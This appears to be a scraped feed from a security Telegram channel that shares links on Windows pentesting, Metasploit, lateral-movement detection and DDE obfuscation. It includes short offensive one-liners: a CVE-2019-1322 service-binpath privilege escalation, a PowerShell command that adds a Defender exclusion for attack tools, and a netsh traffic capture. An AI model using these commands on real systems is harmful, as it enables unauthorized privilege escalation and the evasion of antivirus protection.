Windows 10 Updates from September 2018 vs. Metasploit - Some fun with Windows Defender and Mimikatz
https://www.youtube.com/watch?v=cq-tgcmMHXU&feature=youtu.be
#windows
https://www.youtube.com/watch?v=cq-tgcmMHXU&feature=youtu.be
#windows
YouTube
Windows 10 dpdate from September 2018 vs. Metasploit
Windows 10 x86_64 ver 10..0.17134.286 build vs. Metasploit
Detecting Lateral Movements in Windows Infrastructure
http://cert.europa.eu/static/WhitePapers/CERT-EU_SWP_17-002_Lateral_Movements.pdf
#windows
#security
http://cert.europa.eu/static/WhitePapers/CERT-EU_SWP_17-002_Lateral_Movements.pdf
#windows
#security
https://sid-500.com/downloads/
Here you can find a collection of my PowerShell scripts and modules. Have fun with it!
#windows
#ps
Here you can find a collection of my PowerShell scripts and modules. Have fun with it!
#windows
#ps
SID-500.COM
Downloads
Welcome to the downloads section! Here you can find a collection of my PowerShell scripts and modules. Active Directory Domain Services Section (1.1) AD SectionDownload Alert me, if a DC is do…
Three New DDE Obfuscation Methods
https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
#office
#windows
https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
#office
#windows
ReversingLabs
Three New DDE Obfuscation Methods
Cisco Talos and ReversingLabs discover a new spam campaign spreading the Adwind 3.0 remote access tool (RAT), ReversingLabs details three new DDE obfuscation methods.
DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
On modern #Windows systems one can capture traffic without sniffer, just by "netsh trace start capture=yes" command => ETL file created.
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
Add a file/folder to #Windows Defender exclusion list
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp